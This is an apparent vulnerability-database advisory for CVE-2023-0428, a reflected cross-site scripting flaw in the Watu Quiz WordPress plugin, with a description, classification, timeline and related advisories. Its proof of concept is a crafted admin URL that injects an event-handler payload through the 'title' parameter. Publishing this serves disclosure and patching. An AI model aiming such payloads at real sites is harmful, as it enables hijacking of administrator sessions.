Watu Quiz < 3.3.8.2 – Reflected XSS | CVE 2023-0428 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

Proof of Concept

Make a logged in admin open the following URL:

https://example.com/wp-admin/admin.php?page=watu_exams&title=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2F

Affects Plugins

Fixed in 3.3.8.2

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Felipe Restrepo Rodriguez

Submitter

Felipe Restrepo Rodriguez

Submitter website

https://pfelilpe.com

Submitter twitter

Verified

Yes

WPVDB ID

c933460b-f77d-4986-9f5a-32d9f3f8b412

Timeline

Publicly Published

2023-01-24 (about 2 years ago)

Added

2023-01-24 (about 2 years ago)

Last Updated

2023-01-24 (about 2 years ago)

Other

Published

Title

Published

2021-04-08

Title

Stop Spammers < 2021.9 - Reflected Cross-Site Scripting (XSS)

Published

2019-09-13

Title

Woody Ad Snippets < 2.2.9 - Authenticated Cross-Site Scripting (XSS)

Published

2024-03-05

Title

Fluent Forms < 5.1.10 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2014-01-31

Title

Media File Renamer < 2.2.2 - Stored Cross-Site Scripting (XSS)

Published

2025-02-03

Title

Total Contest Lite < 2.9.0 - Reflected XSS